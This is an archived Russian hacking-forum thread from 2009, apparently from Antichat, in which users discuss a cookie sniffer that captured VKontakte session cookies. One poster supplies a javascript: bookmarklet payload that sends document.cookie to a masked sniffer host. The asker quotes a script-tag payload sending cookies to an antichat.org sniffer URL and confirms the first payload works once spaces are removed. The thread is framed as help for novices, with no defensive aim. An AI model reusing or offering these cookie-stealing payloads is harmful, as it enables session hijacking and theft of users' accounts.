PDA

Просмотр полной версии : XSS - контакт

FatalLerr0r
18.05.2009, 18:18
Здравствуйте! Помогие пожалуйсто, вот такая ситуация произошла....я юзаю ачатовский сниффер, но ктото недавно видимо заюзал мой снифф....Но дело не в этом, я вот увидел , что в моем сниффе появились куки от контакта!!! тоесть там было :

Запрос с vkontakte.ru (**.**.****)
QUERY: remixlang=0; __utmz=2010492......ну как пложено в общем
Но проблема в том что в Reffer не показано нечего = (
в реффере вот это :
REFERER: http://vkontakte.ru/id11597***?25*3*

Скажите , что это значит? Вконтакте есть активка о_О ???? Или как можно вапще пощупать эту багу? я заходил на страницу...обычный какойто юзер , нече у него на странице интресного ( скриптов) неувидел(
S0ulVortex
18.05.2009, 18:21
если не ошибаюсь можно зайти вконтакт и потом стереть урл и прописать cниф
FatalLerr0r
18.05.2009, 18:23
ага и нечего непроизойдет ( ток что попробовал)
S0ulVortex
18.05.2009, 18:26
плохо пробовал
S0ulVortex
18.05.2009, 18:30
javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);

Как-то так :)
FatalLerr0r
18.05.2009, 18:31
плохо пробовал
В таком случае обьясни плз новичку , что ты имел ввиду, тоесть я зашел вконтакт, стер укр , вписал туда :
<script>img = new Image();img.src = "http://antichat.org/s/*******.gif?"+document.cookie;</script>

Если просто сниф вставить без КСС то будет ПУСТОЙ реффер !!! а кук небудет!

Где ошибка?
S0ulVortex
18.05.2009, 18:32
В таком случае обьясни плз новичку , что ты имел ввиду, тоесть я зашел вконтакт, стер укр , вписал туда :
<script>img = new Image();img.src = "http://antichat.org/s/*******.gif?"+document.cookie;</script>

Где ошибка?
Это тебе не сайт а браузер так не прокатит. :)
FatalLerr0r
18.05.2009, 18:35
Я понял уже...тока чето
javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);
непомогает, "0" !
S0ulVortex
18.05.2009, 18:36
Я понял уже...тока чето
javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);
непомогает, "0" !


ПРОБЕЛЫ УБЕРИ
FatalLerr0r
18.05.2009, 18:48
Пипеец я ламо...=// Спс биг S0ulVortex ! Все пашет , кулл, терь я понимаю это дело , спс = )
FatalLerr0r
18.05.2009, 18:55
Эмм....модеры тему делит плз.......
smitXP
05.06.2009, 21:13
зачем del? новичкам вроде меня пригодиться! извените за офф